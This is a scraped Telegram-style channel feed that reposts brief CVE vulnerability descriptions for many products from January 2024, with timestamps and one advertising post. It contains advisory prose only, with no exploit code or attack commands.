🚨 CVE-2023-34323When a transaction is committed, C Xenstored will first checkthe quota is correct before attempting to commit any nodes. It wouldbe possible that accounting is temporarily negative if a node hasbeen removed outside of the transaction.Unfortunately, some versions of C Xenstored are assuming that thequota cannot be negative and are using assert() to confirm it. Thiswill lead to C Xenstored crash when tools are built without -DNDEBUG(this is the default).🎖@cveNotify |
|
| 2024-01-11 17:37:25 |
🚨 CVE-2023-50020An issue was discovered in open5gs v2.6.6. SIGPIPE can be used to crash AMF.🎖@cveNotify |
|
| 2024-01-11 17:37:24 |
🚨 CVE-2023-50019An issue was discovered in open5gs v2.6.6. InitialUEMessage, Registration request sent at a specific time can crash AMF due to incorrect error handling of Nudm_UECM_Registration response.🎖@cveNotify |
|
| 2024-01-11 17:07:32 |
🚨 CVE-2024-22087route in main.c in Pico HTTP Server in C through f3b69a6 has an sprintf stack-based buffer overflow via a long URI, leading to remote code execution.🎖@cveNotify |
|
| 2024-01-11 17:07:26 |
🚨 CVE-2024-22086handle_request in http.c in cherry through 4b877df has an sscanf stack-based buffer overflow via a long URI, leading to remote code execution.🎖@cveNotify |
|
| 2024-01-11 17:07:25 |
🚨 CVE-2023-6551As a simple library, class.upload.php does not perform an in-depth check on uploaded files, allowing a stored XSS vulnerability when the default configuration is used. Developers must be aware of that fact and use extension whitelisting accompanied by forcing the server to always provide content-type based on the file extension. The README has been updated to include these guidelines.🎖@cveNotify |
|
| 2024-01-11 17:07:24 |
🚨 CVE-2024-21625SideQuest is a place to get virtual reality applications for Oculus Quest. The SideQuest desktop application uses deep links with a custom protocol (`sidequest://`) to trigger actions in the application from its web contents. Because, prior to version 0.10.35, the deep link URLs were not sanitized properly in all cases, a one-click remote code execution can be achieved in cases when a device is connected, the user is presented with a malicious link and clicks it from within the application. As of version 0.10.35, the custom protocol links within the electron application are now being parsed and sanitized properly.🎖@cveNotify |
|
| 2024-01-11 16:37:32 |
🚨 CVE-2023-51748ScaleFusion 10.5.2 does not properly limit users to the Edge application because Ctrl-O and Ctrl-S can be used.🎖@cveNotify |
|
| 2024-01-11 16:37:26 |
🚨 CVE-2023-50159In ScaleFusion (Windows Desktop App) agent v10.5.2, Kiosk mode application restrictions can be bypassed allowing arbitrary code to be executed.🎖@cveNotify |
|
| 2024-01-11 16:37:25 |
🚨 CVE-2024-22048govuk_tech_docs versions from 2.0.2 to before 3.3.1 are vulnerable to a cross-site scripting vulnerability. Malicious JavaScript may be executed in the user's browser if a malicious search result is displayed on the search page.🎖@cveNotify |
|
| 2024-01-11 16:37:24 |
🚨 CVE-2023-6654A vulnerability classified as critical was found in PHPEMS 6.x/7.x/8.x/9.0. Affected by this vulnerability is an unknown functionality in the library lib/session.cls.php of the component Session Data Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247357 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-11 16:07:33 |
🚨 CVE-2023-52146Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Aaron J 404 Solution.This issue affects 404 Solution: from n/a through 2.33.0.🎖@cveNotify |
|
| 2024-01-11 16:07:26 |
🚨 CVE-2023-52122Cross-Site Request Forgery (CSRF) vulnerability in PressTigers Simple Job Board.This issue affects Simple Job Board: from n/a through 2.10.6.🎖@cveNotify |
|
| 2024-01-11 16:07:25 |
🚨 CVE-2023-41782There is a DLL hijacking vulnerability in ZTE ZXCLOUD iRAI, an attacker could place a fake DLL file in a specific directory and successfully exploit this vulnerability to execute malicious code.🎖@cveNotify |
|
| 2024-01-11 16:07:24 |
🚨 CVE-2024-22049httparty before 0.21.0 is vulnerable to an assumed-immutable web parameter vulnerability. A remote and unauthenticated attacker can provide a crafted filename parameter during multipart/form-data uploads which could result in attacker controlled filenames being written.🎖@cveNotify |
|
| 2024-01-11 15:37:31 |
🚨 CVE-2023-6938The Oxygen Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a custom field in all versions up to, and including, 4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Version 4.8.1 of the Oxygen Builder plugin for WordPress addresses this vulnerability by implementing an optional filter to provide output escaping for dynamic data. Please see https://oxygenbuilder.com/documentation/other/security/#filtering-dynamic-data for more details.🎖@cveNotify |
|
| 2024-01-11 15:37:30 |
🚨 CVE-2024-0247A vulnerability classified as critical was found in CodeAstro Online Food Ordering System 1.0. This vulnerability affects unknown code of the file /admin/ of the component Admin Panel. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249778 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-11 15:37:29 |
🚨 CVE-2023-52120Cross-Site Request Forgery (CSRF) vulnerability in Basix NEX-Forms – Ultimate Form Builder – Contact forms and much more.This issue affects NEX-Forms – Ultimate Form Builder – Contact forms and much more: from n/a through 8.5.2.🎖@cveNotify |
|
| 2024-01-11 15:37:26 |
🚨 CVE-2023-52136Cross-Site Request Forgery (CSRF) vulnerability in Smash Balloon Custom Twitter Feeds – A Tweets Widget or X Feed Widget.This issue affects Custom Twitter Feeds – A Tweets Widget or X Feed Widget: from n/a through 2.1.2.🎖@cveNotify |
|
| 2024-01-11 15:37:25 |
🚨 CVE-2023-52129Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress.This issue affects teachPress: from n/a through 9.0.4.🎖@cveNotify |
|
| 2024-01-11 15:37:24 |
🚨 CVE-2018-15560PyCryptodome before 3.6.6 has an integer overflow in the data_len variable in AESNI.c, related to the AESNI_encrypt and AESNI_decrypt functions, leading to the mishandling of messages shorter than 16 bytes.🎖@cveNotify |
|
| 2024-01-11 15:07:25 |
🚨 CVE-2023-39853SQL Injection vulnerability in Dzzoffice version 2.01, allows remote attackers to obtain sensitive information via the doobj and doevent parameters in the Network Disk backend module.🎖@cveNotify |
|
| 2024-01-11 15:07:24 |
🚨 CVE-2023-50612Insecure Permissions vulnerability in fit2cloud Cloud Explorer Lite version 1.4.1, allow local attackers to escalate privileges and obtain sensitive information via the cloud accounts parameter.🎖@cveNotify |
|
| 2024-01-11 14:07:44 |
🚨 CVE-2022-32931This issue was addressed with improved data protection. This issue is fixed in macOS Ventura 13. An app with root privileges may be able to access private information.🎖@cveNotify |
|
| 2024-01-11 14:07:43 |
🚨 CVE-2023-52064Wuzhicms v4.1.0 was discovered to contain a SQL injection vulnerability via the $keywords parameter at /core/admin/copyfrom.php.🎖@cveNotify |
|
| 2024-01-11 14:07:42 |
🚨 CVE-2023-51126Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter.🎖@cveNotify |
|
| 2024-01-11 14:07:38 |
🚨 CVE-2023-29446An improper input validation vulnerability has been discovered that could allow an adversary to inject a UNC path via a malicious project file. This allows an adversary to capture NLTMv2 hashes and potentially crack them offline.🎖@cveNotify |
|
| 2024-01-11 14:07:37 |
🚨 CVE-2022-45793[PROBLEMTYPE] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT].🎖@cveNotify |
|
| 2024-01-11 14:07:36 |
🚨 CVE-2023-31488Hyland Perceptive Filters releases before 2023-12-08 (e.g., 11.4.0.2647), as used in Cisco IronPort Email Security Appliance Software, Cisco Secure Email Gateway, and various non-Cisco products, allow attackers to trigger a segmentation fault and execute arbitrary code via a crafted document.🎖@cveNotify |
|
| 2024-01-11 14:07:33 |
🚨 CVE-2023-50916Kyocera Device Manager before 3.1.1213.0 allows NTLM credential exposure during UNC path authentication via a crafted change from a local path to a UNC path. It allows administrators to configure the backup location of the database used by the application. Attempting to change this location to a UNC path via the GUI is rejected due to the use of a \ (backslash) character, which is supposed to be disallowed in a pathname. Intercepting and modifying this request via a proxy, or sending the request directly to the application endpoint, allows UNC paths to be set for the backup location. Once such a location is set, Kyocera Device Manager attempts to confirm access and will try to authenticate to the UNC path; depending on the configuration of the environment, this may authenticate to the UNC with Windows NTLM hashes. This could allow NTLM credential relaying or cracking attacks.🎖@cveNotify |
|
| 2024-01-11 14:07:32 |
🚨 CVE-2023-46712A improper access control in Fortinet FortiPortal version 7.0.0 through 7.0.6, Fortinet FortiPortal version 7.2.0 through 7.2.1 allows attacker to escalate its privilege via specifically crafted HTTP requests.🎖@cveNotify |
|
| 2024-01-11 14:07:31 |
🚨 CVE-2023-37934An allocation of resources without limits or throttling vulnerability [CWE-770] in FortiPAM 1.0 all versions allows an authenticated attacker to perform a denial of service attack via sending crafted HTTP or HTTPS requests in a high frequency.🎖@cveNotify |
|
| 2024-01-11 14:07:26 |
🚨 CVE-2023-47560An OS command injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to execute commands via a network.We have already fixed the vulnerability in the following version:QuMagie 2.2.1 and later🎖@cveNotify |
|
| 2024-01-11 14:07:25 |
🚨 CVE-2023-3726OCSInventory allow stored email template with special characters that lead to a Stored cross-site Scripting.🎖@cveNotify |
|
| 2024-01-11 12:37:24 |
🚨 CVE-2022-4958A vulnerability classified as problematic has been found in qkmc-rk redbbs 1.0. Affected is an unknown function of the component Post Handler. The manipulation of the argument title leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250236.🎖@cveNotify |
|
| 2024-01-11 09:37:43 |
🚨 CVE-2022-2224The WordPress plugin Gallery for Social Photo is vulnerable to Cross-Site Request Forgery in versions up to, and including 1.0.0.27 due to failure to properly check for the existence of a nonce in the function gifeed_duplicate_feed. This make it possible for unauthenticated attackers to duplicate existing posts or pages granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-11 09:37:36 |
🚨 CVE-2022-2039The Free Live Chat Support plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including 1.0.11. This is due to missing nonce protection on the livesupporti_settings() function found in the ~/livesupporti.php file. This makes it possible for unauthenticated attackers to inject malicious web scripts into the page, granted they can trick a site's administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-11 09:37:35 |
🚨 CVE-2022-1768The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to insufficient escaping and parameterization on user supplied data passed to multiple SQL queries in the ~/rsvpmaker-email.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to, and including, 9.3.2. Please note that this is separate from CVE-2022-1453 & CVE-2022-1505.🎖@cveNotify |
|
| 2024-01-11 09:37:31 |
🚨 CVE-2022-1918The ToolBar to Share plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0. This is due to missing nonce validation on the plugin_toolbar_comparte page. This makes it possible for unauthenticated attackers to update the plugins settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-11 09:37:30 |
🚨 CVE-2022-1209The Ultimate Member plugin for WordPress is vulnerable to arbitrary redirects due to insufficient validation on supplied URLs in the social fields of the Profile Page, which makes it possible for attackers to redirect unsuspecting victims in versions up to, and including, 2.3.1.🎖@cveNotify |
|
| 2024-01-11 09:37:26 |
🚨 CVE-2022-0993The SiteGround Security plugin for WordPress is vulnerable to authentication bypass that allows unauthenticated users to log in as administrative users due to missing identity verification on the 2FA back-up code implementation that logs users in upon success. This affects versions up to, and including, 1.2.5.🎖@cveNotify |
|
| 2024-01-11 09:37:25 |
🚨 CVE-2022-0834The Amelia WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the lastName parameter found in the ~/src/Application/Controller/User/Customer/AddCustomerController.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user accesses the booking calendar with the date the attacker has injected the malicious payload into. This affects versions up to and including 1.0.46.🎖@cveNotify |
|
| 2024-01-11 08:37:25 |
🚨 CVE-2024-0252ManageEngine ADSelfService Plus versions 6401 and below are vulnerable to the remote code execution due to the improper handling in the load balancer component.🎖@cveNotify |
|
| 2024-01-11 08:37:24 |
🚨 CVE-2023-37644SWFTools 0.9.2 772e55a allows attackers to trigger a large memory-allocation attempt via a crafted document, as demonstrated by pdf2swf. This occurs in png_read_chunk in lib/png.c.🎖@cveNotify |
|
| 2024-01-11 07:37:32 |
🚨 CVE-2023-6699The WP Compress – Image Optimizer [All-In-One] plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 6.10.33 via the css parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.🎖@cveNotify |
|
| 2024-01-11 07:37:26 |
🚨 CVE-2023-6520The WP 2FA – Two-factor authentication for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.0. This is due to missing or incorrect nonce validation on the send_backup_codes_email function. This makes it possible for unauthenticated attackers to send emails with arbitrary content to registered users via a forged request granted they can trick a site administrator or other registered user into performing an action such as clicking on a link. While a nonce check is present, it is only executed if a nonce is set. By omitting a nonce from the request, the check can be bypassed.🎖@cveNotify |
|
| 2024-01-11 07:37:25 |
🚨 CVE-2023-6223The LearnPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.5.7 via the /wp-json/lp/v1/profile/course-tab REST API due to missing validation on the 'userID' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve the details of another user's course progress.🎖@cveNotify |
|
| 2024-01-11 07:37:24 |
🚨 CVE-2023-42941The issue was addressed with improved checks. This issue is fixed in iOS 17.2 and iPadOS 17.2. An attacker in a privileged network position may be able to perform a denial-of-service attack using crafted Bluetooth packets.🎖@cveNotify |
|
| 2024-01-11 06:37:24 |
🚨 CVE-2024-21637Authentik is an open-source Identity Provider. Authentik is a vulnerable to a reflected Cross-Site Scripting vulnerability via JavaScript-URIs in OpenID Connect flows with `response_mode=form_post`. This relatively user could use the described attacks to perform a privilege escalation. This vulnerability has been patched in versions 2023.10.6 and 2023.8.6.🎖@cveNotify |
|
| 2024-01-11 06:29:53 |
Do you enjoy reading this channel?Perhaps you have thought about placing ads on it?To do this, follow three simple steps:1) Sign up: https://telega.io/c/cveNotify2) Top up the balance in a convenient way3) Create an advertising postIf the topic of your post fits our channel, we will publish it with pleasure. |
|
| 2024-01-11 05:37:24 |
🚨 CVE-2023-6630The Contact Form 7 – Dynamic Text Extension plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.0 via the CF7_get_custom_field and CF7_get_current_user shortcodes due to missing validation on a user controlled key. This makes it possible for authenticated attackers with contributor access or higher to access arbitrary metadata of any post type, referencing the post by id and the meta by key.🎖@cveNotify |
|
| 2024-01-11 04:37:25 |
🚨 CVE-2023-6478A flaw was found in xorg-server. A specially crafted request to RRChangeProviderProperty or RRChangeOutputProperty can trigger an integer overflow which may lead to a disclosure of sensitive information.🎖@cveNotify |
|
| 2024-01-11 04:37:24 |
🚨 CVE-2023-6377A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved.🎖@cveNotify |
|
| 2024-01-11 03:37:32 |
🚨 CVE-2021-42646XML External Entity (XXE) vulnerability in the file based service provider creation feature of the Management Console in WSO2 API Manager 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; and WSO2 IS as Key Manager 5.7.0, 5.9.0, and 5.10.0; and WSO2 Identity Server 5.7.0, 5.8.0, 5.9.0, 5.10.0, and 5.11.0. Allows attackers to gain read access to sensitive information or cause a denial of service via crafted GET requests.🎖@cveNotify |
|
| 2024-01-11 03:37:26 |
🚨 CVE-2002-20001The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys, and trigger expensive server-side DHE modular-exponentiation calculations, aka a D(HE)at or D(HE)ater attack. The client needs very little CPU resources and network bandwidth. The attack may be more disruptive in cases where a client can require a server to select its largest supported key size. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE.🎖@cveNotify |
|
| 2024-01-11 03:37:25 |
🚨 CVE-2020-24704An issue was discovered in certain WSO2 products. The Try It tool allows Reflected XSS. This affects API Manager 2.2.0, API Manager Analytics 2.2.0, API Microgateway 2.2.0, Data Analytics Server 3.2.0, Enterprise Integrator through 6.6.0, IS as Key Manager 5.5.0, Identity Server 5.5.0 and 5.8.0, Identity Server Analytics 5.5.0, and IoT Server 3.3.0 and 3.3.1.🎖@cveNotify |
|
| 2024-01-11 03:37:24 |
🚨 CVE-2020-24703An issue was discovered in certain WSO2 products. A valid Carbon Management Console session cookie may be sent to an attacker-controlled server if the victim submits a crafted Try It request, aka Session Hijacking. This affects API Manager 2.2.0, API Manager Analytics 2.2.0, API Microgateway 2.2.0, Data Analytics Server 3.2.0, Enterprise Integrator through 6.6.0, IS as Key Manager 5.5.0, Identity Server 5.5.0 and 5.8.0, Identity Server Analytics 5.5.0, and IoT Server 3.3.0 and 3.3.1.🎖@cveNotify |
|
| 2024-01-11 02:37:32 |
🚨 CVE-2023-45173IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the NFS kernel extension to cause a denial of service. IBM X-Force ID: 267971.🎖@cveNotify |
|
| 2024-01-11 02:37:26 |
🚨 CVE-2023-38652Multiple integer overflow vulnerabilities exist in the VZT vzt_rd_block_vch_decode dict parsing functionality of GTKWave 3.3.115. A specially crafted .vzt file can lead to memory corruption. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the integer overflow when num_time_ticks is not zero.🎖@cveNotify |
|
| 2024-01-11 02:37:25 |
🚨 CVE-2023-38649Multiple out-of-bounds write vulnerabilities exist in the VZT vzt_rd_get_facname decompression functionality of GTKWave 3.3.115. A specially crafted .vzt file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the out-of-bounds write perfomed by the string copy loop.🎖@cveNotify |
|
| 2024-01-11 02:37:24 |
🚨 CVE-2023-38648Multiple out-of-bounds write vulnerabilities exist in the VZT vzt_rd_get_facname decompression functionality of GTKWave 3.3.115. A specially crafted .vzt file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the out-of-bounds write perfomed by the prefix copy loop.🎖@cveNotify |
|
| 2024-01-11 02:07:24 |
🚨 CVE-2023-29357Microsoft SharePoint Server Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-01-11 01:37:25 |
🚨 CVE-2024-21666The Customer Management Framework (CMF) for Pimcore adds functionality for customer data management, segmentation, personalization and marketing automation. An authenticated and unauthorized user can access the list of potential duplicate users and see their data. Permissions are enforced when reaching the `/admin/customermanagementframework/duplicates/list` endpoint allowing an authenticated user without the permissions to access the endpoint and query the data available there. Unauthorized user(s) can access PII data from customers. This vulnerability has been patched in version 4.0.6.🎖@cveNotify |
|
| 2024-01-11 01:37:24 |
🚨 CVE-2024-20672.NET Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-01-11 00:37:25 |
🚨 CVE-2024-21821Multiple TP-LINK products allow a network-adjacent authenticated attacker to execute arbitrary OS commands. Affected products/versions are as follows: Archer AX3000 firmware versions prior to "Archer AX3000(JP)_V1_1.1.2 Build 20231115", Archer AX5400 firmware versions prior to "Archer AX5400(JP)_V1_1.1.2 Build 20231115", and Archer AXE75 firmware versions prior to "Archer AXE75(JP)_V1_231115".🎖@cveNotify |
|
| 2024-01-11 00:37:24 |
🚨 CVE-2024-21773Multiple TP-LINK products allow a network-adjacent unauthenticated attacker with access to the product to execute arbitrary OS commands. Affected products/versions are as follows: Archer AX3000 firmware versions prior to "Archer AX3000(JP)_V1_1.1.2 Build 20231115", Archer AX5400 firmware versions prior to "Archer AX5400(JP)_V1_1.1.2 Build 20231115", Deco X50 firmware versions prior to "Deco X50(JP)_V1_1.4.1 Build 20231122", and Deco XE200 firmware versions prior to "Deco XE200(JP)_V1_1.2.5 Build 20231120".🎖@cveNotify |
|
| 2024-01-10 23:37:25 |
🚨 CVE-2023-48418In checkDebuggingDisallowed of DeviceVersionFragment.java, there is a possible way to access adb before SUW completion due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation🎖@cveNotify |
|
| 2024-01-10 23:37:24 |
🚨 CVE-2023-41999An authentication bypass exists in Arcserve UDP prior to version 9.2. An unauthenticated, remote attacker can obtain a valid authentication identifier that allows them to authenticate to the management console and perform tasks that require authentication.🎖@cveNotify |
|
| 2024-01-10 22:37:25 |
🚨 CVE-2023-41992The issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.7, iOS 16.7 and iPadOS 16.7, macOS Ventura 13.6. A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2024-01-10 22:37:24 |
🚨 CVE-2023-41991A certificate validation issue was addressed. This issue is fixed in macOS Ventura 13.6, iOS 16.7 and iPadOS 16.7. A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2024-01-10 21:37:32 |
🚨 CVE-2023-51126Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter.🎖@cveNotify |
|
| 2024-01-10 21:37:25 |
🚨 CVE-2022-45793[PROBLEMTYPE] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT].🎖@cveNotify |
|
| 2024-01-10 21:37:24 |
🚨 CVE-2023-5981A vulnerability was found that the response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding.🎖@cveNotify |
|
| 2024-01-10 21:07:25 |
🚨 CVE-2024-0261A vulnerability has been found in Sentex FTPDMIN 0.96 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component RNFR Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249817 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-10 21:07:24 |
🚨 CVE-2023-52277Royal RoyalTSX before 6.0.2.1 allows attackers to cause a denial of service (Heap Memory Corruption and application crash) or possibly have unspecified other impact via a long hostname in an RTSZ file, if the victim clicks on Test Connection. This occurs during SecureGatewayHost object processing in RAPortCheck.createNWConnection.🎖@cveNotify |
|
| 2024-01-10 20:07:32 |
🚨 CVE-2020-13878IrfanView B3D PlugIns before version 4.56 has a B3d.dll!+27ef heap-based out-of-bounds write.🎖@cveNotify |
|
| 2024-01-10 20:07:26 |
🚨 CVE-2024-22088Lotos WebServer through 0.1.1 (commit 3eb36cc) has a use-after-free in buffer_avail() at buffer.h via a long URI, because realloc is mishandled.🎖@cveNotify |
|
| 2024-01-10 20:07:25 |
🚨 CVE-2023-47473Directory Traversal vulnerability in fuwushe.org iFair versions 23.8_ad0 and before allows an attacker to obtain sensitive information via a crafted script.🎖@cveNotify |
|
| 2024-01-10 20:07:24 |
🚨 CVE-2023-42358An issue was discovered in O-RAN Software Community ric-plt-e2mgr in the G-Release environment, allows remote attackers to cause a denial of service (DoS) via a crafted request to the E2Manager API component.🎖@cveNotify |
|
| 2024-01-10 19:37:32 |
🚨 CVE-2023-50916Kyocera Device Manager before 3.1.1213.0 allows NTLM credential exposure during UNC path authentication via a crafted change from a local path to a UNC path. It allows administrators to configure the backup location of the database used by the application. Attempting to change this location to a UNC path via the GUI is rejected due to the use of a \ (backslash) character, which is supposed to be disallowed in a pathname. Intercepting and modifying this request via a proxy, or sending the request directly to the application endpoint, allows UNC paths to be set for the backup location. Once such a location is set, Kyocera Device Manager attempts to confirm access and will try to authenticate to the UNC path; depending on the configuration of the environment, this may authenticate to the UNC with Windows NTLM hashes. This could allow NTLM credential relaying or cracking attacks.🎖@cveNotify |
|
| 2024-01-10 19:37:26 |
🚨 CVE-2023-5879Users’ product account authentication data was stored in clear text in The Genie Company Aladdin Connect Mobile Application Version 5.65 Build 2075 (and below) on Android Devices. This allows the attacker, with access to the android device, to potentially retrieve users' clear text authentication credentials.🎖@cveNotify |
|
| 2024-01-10 19:37:25 |
🚨 CVE-2023-28786URL Redirection to Untrusted Site ('Open Redirect') vulnerability in SolidWP Solid Security – Password, Two Factor Authentication, and Brute Force Protection.This issue affects Solid Security – Password, Two Factor Authentication, and Brute Force Protection: from n/a through 8.1.4.🎖@cveNotify |
|
| 2024-01-10 19:37:24 |
🚨 CVE-2023-51079A long execution time can occur in the ParseTools.subCompileExpression method in MVEL 2.5.0.Final because of many Java class lookups. NOTE: the vendor disputes this because "the only thing that you could expect is that the parser will take a crazy amount of time to complete its task."🎖@cveNotify |
|
| 2024-01-10 19:07:25 |
🚨 CVE-2023-46136Werkzeug is a comprehensive WSGI web application library. If an upload of a file that starts with CR or LF and then is followed by megabytes of data without these characters: all of these bytes are appended chunk by chunk into internal bytearray and lookup for boundary is performed on growing buffer. This allows an attacker to cause a denial of service by sending crafted multipart data to an endpoint that will parse it. The amount of CPU time required can block worker processes from handling legitimate requests. This vulnerability has been patched in version 3.0.1.🎖@cveNotify |
|
| 2024-01-10 19:07:24 |
🚨 CVE-2022-20727Multiple vulnerabilities in the Cisco IOx application hosting environment on multiple Cisco platforms could allow an attacker to inject arbitrary commands into the underlying host operating system, execute arbitrary code on the underlying host operating system, install applications without being authenticated, or conduct a cross-site scripting (XSS) attack against a user of the affected software. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2024-01-10 18:37:33 |
🚨 CVE-2023-47862A local file inclusion vulnerability exists in the getLanguageFromBrowser functionality of WWBN AVideo dev master commit 15fed957fb. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can send a series of HTTP requests to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-10 18:37:26 |
🚨 CVE-2023-47861A cross-site scripting (xss) vulnerability exists in the channelBody.php user name functionality of WWBN AVideo 11.6 and dev master commit 15fed957fb. A specially crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get a user to visit a webpage to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-10 18:37:25 |
🚨 CVE-2024-0217A use-after-free flaw was found in PackageKitd. In some conditions, the order of cleanup mechanics for a transaction could be impacted. As a result, some memory access could occur on memory regions that were previously freed. Once freed, a memory region can be reused for other allocations and any previously stored data in this memory region is considered lost.🎖@cveNotify |
|
| 2024-01-10 18:37:24 |
🚨 CVE-2016-10165The Type_MLU_Read function in cmstypes.c in Little CMS (aka lcms2) allows remote attackers to obtain sensitive information or cause a denial of service via an image with a crafted ICC profile, which triggers an out-of-bounds heap read.🎖@cveNotify |
|
| 2024-01-10 18:07:25 |
🚨 CVE-2023-46742CubeFS is an open-source cloud-native file storage system. CubeFS prior to version 3.3.1 was found to leak users secret keys and access keys in the logs in multiple components. When CubeCS creates new users, it leaks the users secret key. This could allow a lower-privileged user with access to the logs to retrieve sensitive information and impersonate other users with higher privileges than themselves. The issue has been patched in v3.3.1. There is no other mitigation than upgrading CubeFS.🎖@cveNotify |
|
| 2024-01-10 18:07:24 |
🚨 CVE-2023-46740CubeFS is an open-source cloud-native file storage system. Prior to version 3.3.1, CubeFS used an insecure random string generator to generate user-specific, sensitive keys used to authenticate users in a CubeFS deployment. This could allow an attacker to predict and/or guess the generated string and impersonate a user thereby obtaining higher privileges. When CubeFS creates new users, it creates a piece of sensitive information for the user called the “accessKey”. To create the "accesKey", CubeFS uses an insecure string generator which makes it easy to guess and thereby impersonate the created user. An attacker could leverage the predictable random string generator and guess a users access key and impersonate the user to obtain higher privileges. The issue has been fixed in v3.3.1. There is no other mitigation than to upgrade.🎖@cveNotify |
|
| 2024-01-10 17:37:25 |
🚨 CVE-2016-10962The icegram plugin before 1.9.19 for WordPress has CSRF via the wp-admin/edit.php option_name parameter.🎖@cveNotify |
|
| 2024-01-10 17:37:24 |
🚨 CVE-2019-15830The icegram plugin before 1.10.29 for WordPress has ig_cat_list XSS.🎖@cveNotify |
|
| 2024-01-10 17:07:32 |
🚨 CVE-2023-46741CubeFS is an open-source cloud-native file storage system. A vulnerability was found in CubeFS prior to version 3.3.1 that could allow users to read sensitive data from the logs which could allow them escalate privileges. CubeFS leaks configuration keys in plaintext format in the logs. These keys could allow anyone to carry out operations on blobs that they otherwise do not have permissions for. For example, an attacker that has succesfully retrieved a secret key from the logs can delete blogs from the blob store. The attacker can either be an internal user with limited privileges to read the log, or they can be an external user who has escalated privileges sufficiently to access the logs. The vulnerability has been patched in v3.3.1. There is no other mitigation than upgrading.🎖@cveNotify |
|
| 2024-01-10 17:07:26 |
🚨 CVE-2023-46739CubeFS is an open-source cloud-native file storage system. A vulnerability was found during in the CubeFS master component in versions prior to 3.3.1 that could allow an untrusted attacker to steal user passwords by carrying out a timing attack. The root case of the vulnerability was that CubeFS used raw string comparison of passwords. The vulnerable part of CubeFS was the UserService of the master component. The UserService gets instantiated when starting the server of the master component. The issue has been patched in v3.3.1. For impacted users, there is no other way to mitigate the issue besides upgrading.🎖@cveNotify |
|
| 2024-01-10 17:07:25 |
🚨 CVE-2023-6986The EmbedPress – Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's embed_oembed_html shortcode in all versions up to 3.9.5 (exclusive) due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-01-10 17:07:24 |
